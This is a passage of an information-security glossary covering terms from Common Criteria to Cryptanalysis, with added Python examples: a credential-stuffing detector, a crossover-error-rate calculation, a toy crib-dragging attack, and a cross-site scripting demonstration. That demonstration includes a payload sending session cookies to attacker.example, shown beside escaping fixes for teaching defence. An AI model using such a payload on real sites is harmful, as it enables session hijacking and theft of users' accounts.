laws and regulations (“authority documents”). By systematically and
painstakingly analysing the sources, they identify common/shared
requirements. CCH clients may potentially save money by implementing common
controls as part of a suite (a security baseline) rather than
individually and perhaps repeatedly to satisfy each compliance obligation
separately.
|
Common Criteria
(CC),
Common Criteria for Information
Technology Security Evaluation
|
A formal, internationally-recognized scheme (defined in
ISO 15408) to specify, design,
develop, test, evaluate and certify secure IT systems for government and defence
customers, where ‘secure’ is explicitly and formally defined through TOE, PP, ST, SFRs,
SARs
and EALs. The
scheme distributes the substantial costs across participating organisations
(product vendors and customers) while also improving quality, reducing duplication
and facilitating use of common systems etc. by various nations,
agencies etc.
|
Communication
centre
|
“Building where facilities for providing
telecommunications business are sited” (ISO/IEC 27011).
|
Communications security (COMSEC)
|
Arrangements to protect the information content of communications,
and possibly associated metadata
(e.g. who is communicating, when, by what routes/mechanisms, and
how much information is exchanged), and to maintain communications routes and
services (e.g. networks
and point-to-point links). Concerns confidentiality, integrity and availability of information and services. “The
measures and controls taken to deny unauthorised personnel information
derived from telecommunications and to ensure the authenticity of such
telecommunications” (NZ Information Security Manual).
|
Companion
virus
|
Virus
that takes advantage of the operating
system’s prioritisation of file names with certain extensions e.g. a
virus calling itself game.com may be executed in preference to game.exe,
the program the user
intended to run. Companion viruses typically execute covertly then launch the intended program
hoping that the user remains blissfully unaware of the subterfuge.
|
Compensating control
|
A control
that is suboptimal but sufficient to mitigate a risk to some extent and/or achieve compliance with
a security obligation
where, for some reason, the ideal control cannot be used. A workaround,
substitute or compromise control that partially or completely addresses
control gaps, weaknesses, failings or constraints elsewhere.
|
Competence,
competent
|
Capability
of doing something properly, skilfully
and expertly. “Ability to apply knowledge and skills to achieve intended results”
(ISO/IEC 27000).
Cf. incompetent.
|
Competitive [or Competitor] Intelligence
(CI)
|
The term may be explicitly defined to distinguish authentic and ethical means of
gathering information
on competitors (such as collating details from their websites and social media)
from more illicit ones (such as hacking,
social
engineering, physical
site penetration and other industrial espionage techniques).
However, the term is usually undefined, referring implicitly to licit and/or
illicit approaches.
|
Complexity
|
Risks
relating to or arising from the sophistication and fragility of complicated
technologies, systems,
processes etc.
generally constrain the level of information
security achieved in practice, although paradoxically the converse
applies in the case of certain controls
such as passwords,
cryptographic keys, cyphertext and locks.
|
Compliance
|
Assured
conformance
with information security
objectives, controls etc.
defined internally by the organisation
in policies etc.
and/or externally by third
parties (e.g. laws, industry regulations, standards and contractual
terms). May be independently checked by competent and authorized third parties, for example a certification body.
Also, in some organisations, used as the name of the corporate department or
function overseeing
compliance-related activities.
|
Comprehensive National Cybersecurity Initiative
(CNCI)
|
US strategic program to improve the cybersecurity
capabilities of government agencies and critical national infrastructure,
initiated under George W. Bush in 2008. See also the NIST
Cybersecurity Framework.
|
Compromise
|
Generally, a deliberate attack that intentionally causes an event or incident.
Sometimes more loosely refers to any situation that bypasses or disables
security controls,
or that threatens
or merely has the potential to harm or weaken an organisation
or individual in some way.
|
Compromising emanation
|
US military term for stray electromagnetic radiation from devices that may
inadvertently disclose sensitive information. “Unintentional signal that,
if intercepted and analyzed, would disclose the information transferred,
received, handled, or otherwise processed by any telecommunications or
automated information systems equipment.” (Air Force Air Intelligence, Surveillance and
Reconnaissance Agency instruction 33-203, 2011).
|
Computationally infeasible
|
Refers to the likely inability of anyone to solve an
extremely tough mathematical challenge using any current or projected
computing technologies, algorithms
or approaches, within a stated timeframe. Implies a risk-based decision since we have
imperfect knowledge of current cryptanalytical methods, vulnerabilities in cryptosystems etc., while
predicting future technological advances is notoriously difficult (aside from
Moore’s Law until about 2025 anyway).
|
Computer forensics
|
See digital forensics.
|
Computer Misuse
Act
(CMA)
|
UK law that criminalizes unauthorized access to a computer, unauthorized computer
access with intent to commit further crime and unauthorized modification of data – in other words hacking and cracking. The law
was enacted in 1990 after Prince Philip’s mailbox on the Prestel system had been
hacked but the authorities were unable to convict the hackers responsible under extant
legislation (on appeal, they were acquitted of fraud since they did not profit from the
hack).
|
Computer Network
Attack (CNA)
|
US military term for offensive cyberwar capability.
|
Computer Network
Defense (CND)
|
US military term for defensive cyberwar capability. [In other contexts, CND
refers to the Campaign for Nuclear Disarmament.]
|
Computer Network
Exploitation (CNE)
|
US military term for the cyberwar reconnaissance/espionage function.
|
Computer Network
Operations (CNO)
|
US military term for cyberwar capability comprising Computer Network Exploitation, Computer Network Attack
and Computer Network Defense,
all within Information
Operations.
|
Con
|
See fraud.
|
Concept
|
One of the first macro viruses dating back to 1995.
|
Conduit
|
Tube partially protecting data or power cabling against
physical/mechanical damage, fire,
fluid ingress etc. “A tube, duct or pipe used to protect cables” (NZ Information Security Manual).
|
Conficker
|
Very prolific network
worm, released in
2008 and still in the
wild in 2016.
|
Confidence
trickster,
con-man,
con-artist
|
Someone who uses social engineering techniques such as pretexting and masquerading to
establish false confidence in themselves in order to con, fool, cheat, scam or defraud victims.
|
CONFIDENTIAL
|
Commonplace label for a class of information that is sensitive and therefore needs to be protected against unauthorized
or inappropriate access.
It is normally intended for limited distribution within the organisation
or to specially designated third
parties, on a default
deny basis. However, the label and its meaning vary between organisations.
|
Confidential Informant
(CI)
|
Law enforcement
term for a spy or mole, either trained
and placed within a target
organisation
as an undercover
agent or recruited
subsequently perhaps through coercion
or other forms of social
engineering.
|
Confidentiality,
confidential,
in confidence
|
One of the three core objectives of information security, along with availability
and integrity
(the CIA triad),
confidentiality essentially concerns the secrecy, privacy or sensitivity of information. “Property that
information is not made available or disclosed to unauthorized individuals,
entities, or processes”
(ISO/IEC 27000).
|
Configuration Item
(CI)
|
A piece of technology (such as a particular document, piece
of hardware,
source code or compiled program) being managed through the organisation’s
configuration management
system.
|
Configuration Management (CM)
|
A subset of change management activities specifically concerning control over the
configuration of IT systems
and infrastructure, including the parameters or settings and relationships (e.g. a
certain combination of specific versions of the hardware, firmware, operating system and layered software might be
tested thoroughly as a complete system, those test results potentially being
invalidated if changes such as patches
are made to any part).
|
Conflict of interest
|
Situation in which a person or organisation’s loyalty is (potentially or
actually) divided between mutually exclusive responsibilities, for example where their
obligations
to a third party
(e.g. to report a security
incident) conflict with their self-interest (e.g. if
disclosing the incident will cause adverse customer reactions or trigger enforcement
actions for noncompliance).
|
Conformity,
conformance
|
A low-assurance
form of compliance,
typically asserted
by the subject without independent verification. “Fulfillment of a requirement.
Note: the term ‘conformance’ is synonymous but deprecated.” (ISO/IEC 27000).
|
Conformance tester, tester
|
“Individual assigned to perform test activities in
accordance with a given conformance testing standard and associated testing
methodology. An example of such a standard is ISO/IEC 19790 and the testing
methodology specified in ISO/IEC 24759” (ISO/IEC 19896-1:2018).
|
Congestion
|
Capacity constraint e.g. through an excessive
volume of traffic on a network.
Typically reduces performance
and increases latency and may lead to timeouts. Whereas congestion is
normally unintentional or accidental,
hackers may
deliberately inject spurious network traffic in order to conceal their
nefarious activities or cause IT
systems to delay/drop critical security event/alert/alarm messages.
|
Connection forwarding
|
“The use of network address translation to allow a port
on a network node inside a local area network to be accessed from outside the
network. Alternatively, using a Secure Shell server to forward a Transmission
Control Protocol connection to an arbitrary port on the local host” (NZ Information Security Manual).
|
ConOp
(Concept of Operation)
|
Describes the principles or mechanisms of operation of a system, control, process etc.
|
Consensus Assessment
Initiative Questionnaire
(CAIQ)
|
Crude cloud
computing security checklist from the CSA concerning compliance with the CCM, provided as “a set of questions a
cloud consumer and cloud auditor may wish to ask of a cloud provider … a
simplified distillation of the issues, best practices, and control
specifications from [the CSA’s] Guidance and CCM, intended to help organisations
build the necessary assessment processes for engaging with cloud providers.”
Anticipates simple binary yes/no answers to complex issues, hence (being
cynical) respondents are likely to offer the most flattering responses (a
systematic bias).
|
Consent
[of the data subject]
|
“Any freely given, specific, informed and unambiguous
indication of the data subject's wishes by which he or she, by a statement or
by a clear affirmative action, signifies agreement to the processing of
personal data relating to him or her” (GDPR). See also permission and informed consent.
|
Consequence
|
The net result or outcome of a cause-effect relationship
when the cause materializes. “Outcome of an event affecting objectives.
Note: an event can lead to a range of consequences; a consequence can be
certain or uncertain and in the context of information security is usually
negative; consequences can be expressed qualitatively or quantitatively;
initial consequences can escalate through knock-on effects.” (ISO Guide 73).
|
Console
|
A specially-designated terminal device or port on a system intended for system management
purposes such as displaying events,
alerts and alarms, configuring
the system etc. Due to its privileged nature, the console should be physically secured,
normally by being adjacent to the server,
PABX etc. in a secure access-controlled area. On some systems, users who have been
automatically locked out of other terminals/ports (e.g. as a
result of someone repeatedly trying and failing to enter their passwords) are
still able to logon
at the console, a control
against that particular denial
of service.
|
Conspicuous consumption
|
Without a credible explanation for their wealth, fraudsters and
other criminals living the high life on their ill-gotten gains risk being noticed, reported and
investigated by the authorities.
|
Contaminate
|
Taint or discredit forensic evidence, for example through
gaps in the chain of
custody or unexplained physical or logical changes.
|
Content
filtering
|
“The process of monitoring communications such as email
and web pages, analysing them for suspicious content, and preventing the
delivery of suspicious content to users” (NIST SP800-114 rev1).
|
Content Security Policy
|
See CSP.
|
Contextual
information, contextual data
|
Metadata
that may provide additional context or supporting information enabling the nature of the
associated data or
information content to be guessed or interpreted more readily.
|
Contingency
|
Unanticipated and often inherently unpredictable situation, such as an information security
incident or disaster (e.g. a
bomb, plane crash, flood
or fire),
a logical/technical disaster (e.g. malware outbreak, equipment breakdown, software flaw/bug, hack or similar attack on a major business system or network) or a business
disaster (e.g. a serious fraud or hostile takeover attempt), which other controls have
failed to prevent. The appropriate responses are contingent (dependent) on
the exact nature of the incident
and the situation in which it occurs.
|
Contingency
plan,
contingency management
|
Forward-thinking, flexible approach for preparing and marshalling
the organisation’s
people and other resources to cope as effectively as possible in a contingency
situation such as a major incident
or disaster.
Involves preparing and exercising general purpose plans or preparations (such
as forming a crisis
management team from competent, capable people still available), stocking up on tools and
resources (such as duct tape, walkie-talkies and white boards) and building
capabilities (such as resourcefulness, adaptability and a willingness to ‘go
the extra mile’ and ‘do whatever it takes’) ahead of time. Incidents that
are expected or predictable should be covered by conventional risk management
activities, resilience
controls, disaster recovery plans
etc.
|
Continual improvement
|
Determined, conscious effort to mature or get better at
doing something (or at least not to get any worse!) in a systematic, gradual
way. “Recurring activity to enhance performance” (ISO/IEC 27000).
|
Continuous Development
(CD)
|
A software
engineering approach involving making frequent small/incremental/evolutionary
changes to a production system
rather than infrequent large/revolutionary changes as in the traditional
‘waterfall’ SDLC.
See also DevOps.
|
Contract
|
Binding agreement between two or more parties, for various
strengths of ‘binding’. Formal contracts prepared by qualified lawyers and
signed (‘executed’) by duly authorized
representatives are normally legally binding on the parties but may be
unenforceable (especially any terms deemed ‘unfair’ by the courts or
overridden by laws such as the fair
use provisions of copyright
law). Verbal, informal or presumed contracts may also be legally binding,
although they are usually harder to prove and enforce. If someone breaks the
seal on shrink-wrapped
software, for instance, they may be deemed to have accepted
the license
terms and conditions visible through the clear plastic film, implying a
contractual commitment. ‘Social contract’ refers to ethical commitments between the parties e.g. between
worker and organisation.
Generally speaking, contracts may not be unilaterally imposed (e.g. email disclaimers),
hence a signature
and/or a ‘consideration’ (normally a payment) may be necessary to demonstrate
someone’s willingness to commit.
|
Control,
safeguard,
measure,
countermeasure,
protection mechanism
|
[Noun] Something which prevents or reduces the
probability of an information
security incident,
indicates that an incident may have occurred and/or mitigates the damage, harm, costs or other
adverse consequences caused or triggered by or simply following on from an
incident. Some controls mitigate threats
(e.g. deterrents) or impact
(e.g. backups), although most mitigate vulnerabilities. [Verb] To exert
influence over a subordinate by an authority or assertive figure. “Measure that is
modifying risk.
Notes: controls include any process, policy, device, practice, or other
actions which modify risk; controls may not always exert the intended or
assumed modifying effect.” (ISO/IEC 27000).
|
Controller
|
“The natural or legal person, public authority, agency
or other body which, alone or jointly with others, determines the purposes
and means of the processing of personal data; where the purposes and means of
such processing are determined by Union or Member State law, the controller
or the specific criteria for its nomination may be provided for by Union or
Member State law” (GDPR).
|
Control
objective
|
Describes in business terms the anticipated business
purpose or benefit of an information
security control,
encapsulating the risk
reduction requirement. “Statement describing what is to be
achieved as the result of implementing controls” (ISO/IEC 27000).
|
Control Self-Assessment
(CSA)
|
Typically, a regular management review process to assess the status of governance
across the organisation,
including information
security and other forms of risk management and control. May simply involve managers completing
checklists, surveys or questionnaires, possibly then validated by further
independent checks on a sample basis to ensure sufficient integrity in the
responses. Cf. Cloud Security Alliance.
|
Control
total
|
A value (such as a grand total or count of the number of
items) that can be used as a simple cross-check for integrity failures on a data set or process. Used for example to confirm
that all records transmitted through an interface were duly received and
processed by a database, before committing the
changes.
|
Cookie
|
Small text file sent by a website to your browser and
later retrieved, normally to track or modify your web browsing habits (marketing,
surveillance
and ‘carry on where you left off’ functions). If browser settings permit,
different websites may share the information in cookies, raising privacy and other information security
issues.
|
Copyleft
|
Movement using copyright law, in stark contrast to its
normal application, to permit rather than prevent free access to and
collaborative or community development of intellectual property with the express
requirement that derivative works are covered by the same permissive
conditions. Denoted by an inverted copyright symbol (🄯). See also Creative Commons
and GNU General Public
License.
|
Copy
protection,
copy prevention
|
Technical controls
typically involving encryption
and dongles,
intended to prevent or restrict the ability of users to copy or use software and other intellectual property except on the
original authentic
storage media
used for legitimate
distribution.
|
Copyright
|
Legal and moral protection giving the creators of original materials intellectual property rights over the copying, use and dissemination of the information by others, with the ability to permit or prohibit various activities through licenses, contracts or agreements, for decades (commonly the author’s lifetime plus 70 years). Aside from being unethical and often illegal, the wanton or casual abuse of copyright (piracy and plagiarism) is a strong disincentive for creatives to continue investing in, creating and releasing intellectual property. See also copyleft.
|
CORE
IMPACT PRO
|
Costly but well-regarded commercial network security/penetration test tool from CORE
SECURITY. Automates hundreds of exploits against known vulnerabilities.
|
Core
network
|
“Part of a mobile telecommunication network that
connects the access network to the wider communication network. The Internet
and other public networks are examples of wider communication networks.” (ISO/IEC 27033-6).
|
Corporate
fraud
|
Fraud committed against a corporation, or by a corporation’s officers or employees in its name (e.g. falsifying accounts to mislead investors, regulators or auditors).
|
Corporate information security policy
|
Highest-level formal policy stating executive management’s overall position
on information risk
and security e.g. through
a suite of generic principles
and/or axioms. “Document
that describes management direction and support for information security in
accordance with business requirements and relevant laws and regulations.
Note: The document describes the high-level information security requirements
that have to be followed throughout the organisation.” (ISO/IEC 27033-1).
|
Correction
|
More or less complete reversal of an error. “Action to eliminate a
detected nonconformity”
(ISO/IEC 27000).
|
Corrective
action
|
“Action to eliminate the cause of a nonconformity
and to prevent recurrence” (ISO/IEC 27000).
|
Corrective control
|
Form of control
intended to minimize, contain or reverse the damage caused by a security incident, for
example restoring damaged or lost data
from backups or
putting out a fire.
See also preventive
and detective
control.
|
Corroborating evidence
|
Evidence
supporting other evidence. May not be directly related to the case e.g. an
alibi supporting someone’s assertion
that they were not present when a crime was committed.
|
Corruption,
corrupt
|
Common form of integrity failure e.g. data corruption caused
by malware, bugs and user errors, and human corruption involving coercion, bribery and dubious
ethics.
|
COTS
(Commercial Off The Shelf [Software])
|
Refers to standardized as opposed to bespoke software, typically distributed to the general public (historically in shrink-wrapped packages, now mostly by download) under generic and non-negotiable license agreements. The purchaser cannot inspect or change the code, so assurance rests on the vendor, patching and configuration.
|
Counterfeit
|
Pirated,
fake copy misrepresented
as an original, authentic
asset, thereby
infringing the true owner’s
intellectual property rights
and defrauding
the purchaser. Numerous mass-produced counterfeit products and bank notes
are in circulation, some of which are not merely passable but so authentic that even
experts struggle to distinguish them from the genuine articles … although
bargain-basement pricing may be a clue!
|
Counterfeiter
|
Fraudster
who counterfeits.
|
Counter-Intelligence
(CI)
|
See spying.
See also competitive
intelligence.
|
Countermeasure
|
See control.
“Actions, devices, procedures, or techniques that meet or oppose (i.e.,
counters) a threat, a vulnerability, or an attack by eliminating or
preventing it, by minimizing the harm it can cause, or by discovering and
reporting it so that corrective action can be taken.” (CNSSI-4009).
|
Counterstrike,
counter-hack
|
Retaliatory attack
directed against the alleged perpetrator of a prior attack. Aside
from escalating tensions and perhaps being illegal, a counterstrike may be
misdirected for instance if the perpetrator was incorrectly identified,
perhaps because the original attack involved spoofing or other covert, coercive or deceptive techniques. A highly risky approach.
|
Counterterrorism
|
Government-sponsored activities such as propaganda, intelligence, surveillance
and cybertage,
intended to counteract, undermine, prevent or otherwise mitigate terrorism.
|
Cover,
coverage
|
The scope, type or nature of insurance provided, normally defined in
the policy in
terms of events,
perils or hazards, assets
etc. included or excluded, limits of liability plus terms and
conditions.
|
Covert
|
Covered. Refers to secretive, hidden, surreptitious,
undercover, quiet or silent activities or devices, generally unauthorized and malicious in nature, such as bugs used for surveillance
or spying. See
also cryptic.
|
Covert
channel,
back channel
|
Covert or cryptic mechanism by which confidential information is secretly passed out of (or into) a supposedly secure system, network or location (such as a SCIF) in violation of security policy, bypassing the confidentiality controls by using a medium never intended for communication: for instance steganography, or out-of-band signalling such as a program manipulating a circuit’s current demand through specific operating sequences so that an external current-monitoring device can read off the bits. Storage channels modulate something the receiver can read (a file lock, free disk space); timing channels modulate when something happens. Unlike a side channel, which leaks information without the cooperation of the system holding it, a covert channel needs a sender (e.g. a Trojan) inside the protected boundary deliberately modulating the signal. See also backdoor. Cf. side channel.
|
Coveware
|
Niche US company offering support services to organisations hit
by ransomware, such
as negotiating ransoms.
|
CPNI
(Centre for the Protection of National Infrastructure)
|
UK government security services body responsible for guidance and advice concerning physical, personnel and information (including cyber) security arrangements protecting critical national infrastructure (renamed the National Protective Security Authority, NPSA, in 2023).
|
CPTED
(Crime Prevention Through Environmental Design)
|
Physical
architectural design
philosophy that seeks to deter
attacks by
criminals against people innocently using shopping malls, railway stations,
walkways between parking lots and buildings etc. For example, even
lighting and landscaped areas free of hidey-holes permit more effective surveillance monitoring and
escape routes for potential victims,
while barriers and visual cues distinguish private from public property. Thorny bushes near
windows and walls, and razor
wire deter casual if not professional intruders.
|
Crack,
cracker, cracking
|
Malicious
hacker or
criminal, generally motivated by the prospect of personal gain. Passwords, cryptosystems
and safes may be
cracked, for example by brute
force attacks.
|
Crash
|
Unplanned sudden computer system or device failure resulting from an
unhandled exception/error condition
triggered accidentally
by a bug, power
glitch etc. or deliberately by a hack or malware.
|
Crash
dump
|
File containing a snapshot of the contents of main memory
at the time of a crash.
Used by systems
programmers to analyse the status of the stack, heap, registers, buffers,
pointers etc. in an attempt to discover what caused the crash. Used
by hackers to
find confidential
information
such as passwords
and encryption
keys that had been
held temporarily in memory. Used by malware analysts to identify cryptic malware.
|
Creative Commons
(CC)
|
A not-for-profit organisation promoting free access to and use of
intellectual property
as in copyleft.
Their standardized licenses
cater for various situations ranging from placing information unencumbered into the public domain, through
requiring attribution
of the owner, to
restrictions on commercial use and modification.
|
Credential
|
Something a person, system etc. presents to confirm (authenticate)
their asserted
identity (e.g. a
passport, password,
security token
or digital certificate)
or professional capabilities (e.g. résumé or curriculum
vitae plus the original, authentic education and training certificates).
|
Credential stuffing
|
Automated attack in which lists of username/password pairs accumulated from other sources, such as previous breaches, are replayed against the login pages or APIs of unrelated websites, exploiting the widespread reuse of passwords across sites. Unlike password guessing (brute force), each credential pair is usually tried only once per site, and the attempts are spread across many source IP addresses and user agents to evade rate limits. If a logon succeeds (proving the credentials valid), further information may be obtained from the compromised account, perhaps leading to direct exploitation and further compromises (identity fraud). Countermeasures include multifactor authentication, checking new passwords against breach lists and monitoring for many distinct usernames failing from the same source.
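Added detection example (not the glossary’s own code): over constructed login-log lines, flag any source address that tries many distinct usernames within a short window with a high failure ratio, and report the accounts where it nevertheless succeeded, since those are the ones to lock and reset. The log format, thresholds and addresses are assumptions.

```python
"""Credential-stuffing detector run over constructed login-log lines
(added example, not from the glossary). Stuffing shows as one source
trying many *different* usernames, mostly failing, at machine speed;
a forgotten password shows as one user, one address, a few tries."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE = re.compile(r"(\S+) ip=(\S+) user=(\S+) result=(ok|fail)")

# Constructed sample log (documentation addresses, not real traffic).
LOG = """\
2024-03-01T10:00:00 ip=203.0.113.7 user=alice result=fail
2024-03-01T10:00:01 ip=203.0.113.7 user=bob result=fail
2024-03-01T10:00:01 ip=203.0.113.7 user=carol result=fail
2024-03-01T10:00:02 ip=203.0.113.7 user=dave result=ok
2024-03-01T10:00:02 ip=203.0.113.7 user=erin result=fail
2024-03-01T10:00:03 ip=203.0.113.7 user=frank result=fail
2024-03-01T10:00:04 ip=203.0.113.7 user=grace result=fail
2024-03-01T10:00:05 ip=203.0.113.7 user=heidi result=fail
2024-03-01T10:00:06 ip=203.0.113.7 user=ivan result=fail
2024-03-01T10:00:07 ip=203.0.113.7 user=judy result=fail
2024-03-01T10:05:00 ip=198.51.100.4 user=alice result=fail
2024-03-01T10:05:30 ip=198.51.100.4 user=alice result=fail
2024-03-01T10:06:10 ip=198.51.100.4 user=alice result=ok
"""

def parse(log):
    """Yield (timestamp, ip, user, succeeded) for each well-formed line."""
    for line in log.splitlines():
        m = LINE.match(line)
        if m:
            ts, ip, user, result = m.groups()
            yield datetime.fromisoformat(ts), ip, user, result == "ok"

def detect_stuffing(log, window=timedelta(minutes=5),
                    min_users=8, min_fail_ratio=0.7):
    """Return {ip: (distinct_users, attempts, users_that_succeeded)} for
    every source that, within some sliding `window`, tried at least
    `min_users` distinct usernames with a failure ratio >= min_fail_ratio."""
    by_ip = defaultdict(list)
    for ts, ip, user, ok in parse(log):
        by_ip[ip].append((ts, user, ok))
    hits = {}
    for ip, events in by_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            win = events[start:end + 1]
            users = {u for _, u, _ in win}
            fails = sum(1 for _, _, ok in win if not ok)
            if len(users) >= min_users and fails / len(win) >= min_fail_ratio:
                hits[ip] = (len(users), len(win),
                            sorted(u for _, u, ok in win if ok))
    return hits
```

The same logic applied per username rather than per address catches the distributed variant (one account hit from many addresses); in practice both views are needed, plus a count of distinct addresses per user agent, because stuffing tools rotate proxies specifically to stay under per-address thresholds.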
|
Credible
|
Believable. Social engineers and fraudsters work hard to make their pretexts
credible in order to fool their targets
into trusting them
inappropriately.
|
Crenelated
|
Classic ╓┐_╓┐_╓┐_╓┐_╓┐ shaped
tops to the battlements
of Mediaeval castles. Archers cowered behind the uprights for protection while
raining down arrows upon the attackers
below through the gaps. An ancient physical security control.
|
CREST
|
UK-based government-supported not-for-profit organisation
and scheme to test and accredit
penetration testers.
Given the trusted,
privileged
nature of the work, testers must be competent in order for their clients to
place any reliance on their assurance
efforts, and must be trustworthy
since they may gain access
to valuable and/or confidential
information assets
if (when!) tested security
controls fail. See also CBEST.
|
Crib
|
Useful hint for a cryptanalyst, often consisting of some known plaintext
that, for example, will reveal if the correct decryption key has been found by a brute force attack on the cyphertext.
Standard or routine parts of a message (such as a date/time stamp,
predictable sequence number, message type or protocol identifier, greeting or
signature) may be useful cribs.
|
Crimeware,
crimeware kit,
attack toolkit,
exploit kit
|
Software
package used to generate and/or distribute malware using libraries of technical exploits, plus the infection and remote-control
elements including functions to report statistics on the status of the
exploitation process.
A few crimeware kits (such as Carberp
and Zeus) have been
released onto the Internet.
Some are traded commercially on the black market or hacker underground. Most are
jealously guarded by the hackers
who created and maintain them and/or the criminals who pay for and exploit
them.
|
Criminal underground
|
See black
market. See also hacker underground.
|
Crisis
|
Chaotic situation immediately following a serious incident,
characterized by disorder and panic. Survival (of people if not the organisation)
is generally the overriding priority in a crisis, hence all other
considerations (including security)
tend to be disregarded until the crisis subsides.
|
Crisis
management
|
Management
activities during a crisis
such as evacuating buildings, calling the emergency services, triage and
initiating incident
management activities as order is gradually restored.
|
Critical National
Infrastructure (CNI),
Critical Corporate Infrastructure (CCI),
Critical Infrastructure (CI)
|
Shared infrastructure services and supplies, such as
electricity, water, fuel, food, telecommunications, government, law enforcement,
armed services and the security services, that are considered vital for a
nation (CNI) or organisation
(CCI). Significant failure of any of these, perhaps as a result of a physical
or electronic attack
on the ICT
equipment, networks,
things or
people monitoring
and controlling
them, is likely to cause immediate disruption and substantial economic damage
as well as perhaps causing injuries, deaths, environmental incidents etc., making these
attractive targets
in cyberwarfare.
|
Cross border processing
|
“Either (a) processing of personal data which takes
place in the context of the activities of establishments in more than one
Member State of a controller or processor in the Union where the
controller or processor is established in more than one Member State; or
(b) processing of personal data which takes place in the context of the
activities of a single establishment of a controller or processor in the
Union but which substantially affects or is likely to substantially affect
data subjects in more than one Member State” (GDPR).
|
Cross
Site Scripting,
“XSS”
|
Web hacking technique in which data supplied by an attacker (in a URL parameter, form field, bulletin-board post etc.) is returned by a badly-designed website to other users’ browsers without adequate output encoding, so that the browser interprets it as HTML, JavaScript or other executable content rather than plain text and runs it in the context of the vulnerable site (e.g. to steal session cookies, read or modify other supposedly private data in the page, or perform actions as the logged-in user). Reflected XSS returns the attacker’s input immediately in the response to a crafted request; stored XSS saves it (e.g. in a forum message) to be served to every subsequent visitor; DOM-based XSS arises in client-side script handling untrusted input. The root cause is failing to escape untrusted data for the context in which it is emitted, not merely inadequate input validation. [Denoted “XSS” to avoid being confused with Cascading Style Sheets.] A form of code injection. See also XXE.
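Added illustration (not from the glossary): a reflected XSS in a hand-rolled template, beside the same template with escaping appropriate to each output context. The payload, templates and the function names `render_vulnerable`, `render_fixed` and `render_link_fixed` are constructed for the example.

```python
"""Reflected XSS and its fix (added example, not the glossary's code).
Templates, payload and function names are constructed for illustration."""
import html
from urllib.parse import quote

# What an attacker puts in the ?q= parameter of a link sent to the victim.
PAYLOAD = ('<script>new Image().src="https://attacker.example/?c="'
           '+document.cookie</script>')

def render_vulnerable(query: str) -> str:
    """Builds HTML by string concatenation: the user's input goes back to
    the browser verbatim, so any markup in it is parsed and executed."""
    return f"<p>Results for {query}</p>"

def render_fixed(query: str) -> str:
    """HTML-body context: encode &, <, > and both quote characters so the
    browser displays the text instead of interpreting it."""
    return f"<p>Results for {html.escape(query, quote=True)}</p>"

def render_link_fixed(query: str) -> str:
    """A different output context needs a different encoder: inside a URL
    the value is percent-encoded first, then the attribute is HTML-escaped."""
    href = "/search?q=" + quote(query, safe="")
    return f'<a href="{html.escape(href, quote=True)}">search again</a>'

def contains_script(page: str) -> bool:
    """Crude check used here only to show whether a <script> tag reaches
    the browser; real testing uses a browser or a DAST tool."""
    return "<script" in page.lower()
```

Marking the session cookie HttpOnly stops this particular payload reading document.cookie, and a Content Security Policy that forbids inline scripts stops it running at all, but both are defence in depth: the fix is contextual output encoding, ideally done by a templating engine that escapes by default.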
|
Crossover Error
Rate
(CER)
|
In authentication systems (particularly biometrics), the tolerance or sensitivity configuration set point at which false rejections are just as likely as false acceptances. Also known as the Equal Error Rate (EER). Loosening the set point reduces false rejections but increases false acceptances, and vice versa; the CER is a convenient single figure for comparing systems, though the operating point actually chosen depends on whether false acceptance (security) or false rejection (usability) matters more.
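Added illustration (not from the glossary): computing the false acceptance and false rejection rates at every integer set point for constructed genuine and impostor match scores, and locating the crossover. The score lists and the 0..100 score range are made up.

```python
"""Crossover error rate (CER/EER) from constructed biometric match scores.
Added illustration, not from the glossary; the score lists are made up."""

# Similarity scores 0..100 from a notional matcher: higher means
# 'more like the enrolled user'.
GENUINE  = [92, 88, 85, 81, 79, 77, 74, 70, 55, 48]   # legitimate users
IMPOSTOR = [72, 66, 60, 58, 52, 47, 44, 40, 37, 33]   # other people

def far_frr(threshold, genuine=GENUINE, impostor=IMPOSTOR):
    """FAR = share of impostors accepted (score >= threshold);
       FRR = share of genuine users rejected (score < threshold)."""
    far = sum(s >= threshold for s in impostor) / len(impostor)
    frr = sum(s < threshold for s in genuine) / len(genuine)
    return far, frr

def error_curve(genuine=GENUINE, impostor=IMPOSTOR):
    """(threshold, FAR, FRR) for every integer set point."""
    return [(t, *far_frr(t, genuine, impostor)) for t in range(101)]

def crossover(genuine=GENUINE, impostor=IMPOSTOR):
    """Lowest threshold at which |FAR - FRR| is minimal: the CER point."""
    t, far, frr = min(error_curve(genuine, impostor),
                      key=lambda r: (abs(r[1] - r[2]), r[0]))
    return t, far, frr
```

With these scores the curves cross at a threshold of 61 with both rates at 20%; a deployment that fears impostors more than irritated users would set the threshold higher and accept the larger FRR.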
|
Cryptanalysis,
cryptanalyst,
cryptanalytic
|
Study and practice of breaking cryptosystems by any means, normally
through a combination of mathematics, language analysis, brilliant intuition,
lots of time, powerful computers and sheer hard work. The cryptanalyst may
attempt to find and exploit
mathematical or technical weaknesses in the algorithm and/or the system and processes that implement it, guess the
key by brute force,
or somehow disentangle the relationships between known plaintext such as a crib and the corresponding cyphertext.
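Added illustration serving both this entry and the crib entry above (not from the glossary): brute force can only recover a key if something tells the analyst which of the candidate decryptions is right, and a crib does exactly that. The cipher is a toy repeating-key XOR with 65,536 possible keys, standing in for a real cryptosystem; the message and key are constructed.

```python
"""Crib-driven cryptanalysis of a toy repeating-key XOR cipher (added
example; the cipher is a stand-in, the message and key are constructed).
The technique is the general one: derive the key the crib would imply at
each position and keep only self-consistent candidates."""

KEY_LEN = 2   # 256**2 = 65,536 keys: small enough to try them all

def xor_cipher(data: bytes, key: bytes) -> bytes:
    """Encrypt or decrypt (XOR is its own inverse)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# Constructed message: the date stamp is the routine, predictable part.
PLAINTEXT = b"DATE:2024-03-01 ORDERS: MOVE AT DAWN"
SECRET_KEY = bytes([0x5A, 0xC3])
CIPHERTEXT = xor_cipher(PLAINTEXT, SECRET_KEY)

def crib_drag(ct: bytes, crib: bytes):
    """Slide the crib along the cyphertext. At each offset derive the key
    bytes the crib implies; the offset survives only if every crib byte
    agrees on the key byte for its slot. Returns [(offset, key), ...]."""
    hits = []
    for off in range(len(ct) - len(crib) + 1):
        key = [None] * KEY_LEN
        consistent = True
        for i, p in enumerate(crib):
            slot = (off + i) % KEY_LEN
            k = ct[off + i] ^ p
            if key[slot] is None:
                key[slot] = k
            elif key[slot] != k:
                consistent = False
                break
        if consistent and None not in key:
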